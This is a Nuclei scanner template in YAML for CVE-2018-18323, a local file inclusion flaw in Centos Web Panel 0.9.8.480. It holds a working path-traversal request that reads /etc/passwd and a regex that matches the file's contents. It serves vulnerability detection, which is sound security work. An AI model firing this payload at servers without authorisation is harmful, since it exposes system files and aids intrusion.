45 lines
1.6 KiB
YAML
45 lines
1.6 KiB
YAML
id: CVE-2018-18323
|
|
|
|
info:
|
|
name: Centos Web Panel 0.9.8.480 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
|
|
remediation: |
|
|
Upgrade to a patched version of Centos Web Panel.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
|
|
- http://centos-webpanel.com/
|
|
- https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-18323
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-18323
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97126
|
|
epss-percentile: 0.99736
|
|
cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: control-webpanel
|
|
product: webpanel
|
|
tags: cve,cve2018,centos,lfi,packetstorm,control-webpanel
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502210088be48e0fc2d93508bd25d0d68b6b00826de5b6f6e1e7079124cc8e1b8e0fb1e02206deec6a8dc47fcb2b6ce37da1107f72973c50db769e9e741448c152f6d3eecce:922c64590222798bb761d5b6d8e72950 |